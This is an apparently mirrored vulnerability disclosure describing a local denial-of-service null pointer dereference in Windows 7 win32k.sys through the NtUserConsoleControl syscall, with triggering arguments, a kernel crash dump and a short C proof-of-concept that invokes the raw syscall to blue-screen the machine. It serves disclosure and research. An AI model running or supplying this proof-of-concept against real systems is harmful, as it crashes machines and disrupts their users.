Microsoft Windows Kernel (win32k.sys) Local Denial Of Service

Microsoft Windows Kernel (win32k.sys) suffers from a local denial of service null pointer vulnerability in NtUserConsoleControl.


MD5 | 3fd18ac6710b6c0e6ed7b3cfb9170e55

Hello,

It is possible to trigger a BSOD caused by a Null pointer deference when
calling the system call NtUserConsoleControl with the following arguments:

- NtUserControlConsole(1,0,8).
- NtUserControlConsole(4,0,8).
- NtUserControlConsole(6,0,12).
- NtUserControlConsole(2,0,12).
- NtUserControlConsole(3,0,20).
- NtUserControlConsole(5,0,8).

Different crashes are reproduced for each case. For the second case the
crash is showed below:




*EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace
referencia a la memoria en 0x%08lx. La memoria no se pudo %s.FAULTING_IP:
win32k!xxxSetConsoleCaretInfo+*







*c93310641 8b0e mov ecx,dword ptr [esi]TRAP_FRAME: 8c747b2c
-- (.trap 0xffffffff8c747b2c)ErrCode = 00000000eax=00000000 ebx=00000000
ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003eip=93310641
esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nccs=0008
ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010292win32k!xxxSetConsoleCaretInfo+*
















*0xc:93310641 8b0e mov ecx,dword ptr [esi]
ds:0023:00000000=????????Resetting default scopeCUSTOMER_CRASH_COUNT:
1DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULTBUGCHECK_STR: 0x8EPROCESS_NAME:
Win32k-fuzzer_CURRENT_IRQL: 0LAST_CONTROL_TRANSFER: from 9330fc27 to
93310641STACK_TEXT: 8c747bb0 9330fc27 00000000 00000003 00000014
win32k!xxxSetConsoleCaretInfo+*

*0xc8c747bcc 9330fa8d 00000003 00000000 00000014
win32k!xxxConsoleControl+0x1478c747c20 82848b8e 00000003 00000000 00000014
win32k!NtUserConsoleControl+*








*0xc58c747c20 012e6766 00000003 00000000 00000014
nt!KiSystemServicePostCallWARNING: Frame IP not in any known module.
Following frames may be wrong.0016f204 00000000 00000000 00000000 00000000
0x12e6766STACK_COMMAND: kbFOLLOWUP_IP: win32k!xxxSetConsoleCaretInfo+*




*c93310641 8b0e mov ecx,dword ptr [esi]SYMBOL_STACK_INDEX:
0SYMBOL_NAME: win32k!xxxSetConsoleCaretInfo+*









*cFOLLOWUP_NAME: MachineOwnerMODULE_NAME: win32kIMAGE_NAME:
win32k.sysDEBUG_FLR_IMAGE_TIMESTAMP: 5accdebcFAILURE_BUCKET_ID:
0x8E_win32k!*

*xxxSetConsoleCaretInfo+cBUCKET_ID: 0x8E_win32k!*





*xxxSetConsoleCaretInfo+cFollowup: MachineOwner---------kd> r
esiesi=00000000*




*PoC code:*

*#include <Windows.h>*


*extern "C"*

*ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {*

* __asm{mov eax, ApiNumber};*

* __asm{lea edx, ApiNumber + 4};*

* __asm{int 0x2e};*

*}*


*int _tmain(int argc, _TCHAR* argv[])*

*{*

* int st = 0;*

* int syscall_ID = 0x1160; //NtUserControlConsole Windows 7*

*LoadLibrary(L"user32.dll");*


* st = (int)SystemCall32(syscall_ID, 4, 0, 8);*

* return 0;*

*}*


The vulnerability has only been tested in Windows 7 x86.
CVSS Base Score: 5.5
As the vulnerability not meet the bar that Microsoft has for servicing, not
patch will be released.

Best regards,
Victor Portal



Related Posts